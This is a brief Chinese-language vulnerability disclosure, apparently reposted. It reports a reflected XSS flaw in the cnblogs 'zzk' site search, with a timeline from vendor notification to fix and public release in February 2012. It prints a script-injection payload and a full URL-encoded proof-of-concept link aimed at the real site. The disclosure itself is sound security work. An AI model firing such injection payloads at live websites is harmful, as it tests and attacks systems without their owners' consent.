博客园找找看XSS漏洞

2012年02月01日 18:47 (星期三): 漏洞已通知官方!
2012年02月01日 22:51 (星期三): 厂商e-mail回复确认,等待厂商修复!
2012年02月02日 11:50 (星期四): 厂商e-mail回复已经修复!
2012年02月02日 17:54 (星期四): 漏洞向公众公开!

 

简要描述

博客园找找看XSS漏洞

 

详细说明

"><script>alert(/XSS/)</script>

 

漏洞证明

http://zzk.cnblogs.com/s?w=hacker&t=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%58%53%53%2F%29%3C%2F%73%63%72%69%70%74%3E

 

图片证明

博客园找找看XSS漏洞_第1张图片

 

官方确认

博客园找找看XSS漏洞_第2张图片

 

修复回应

博客园找找看XSS漏洞_第3张图片

你可能感兴趣的:(xss)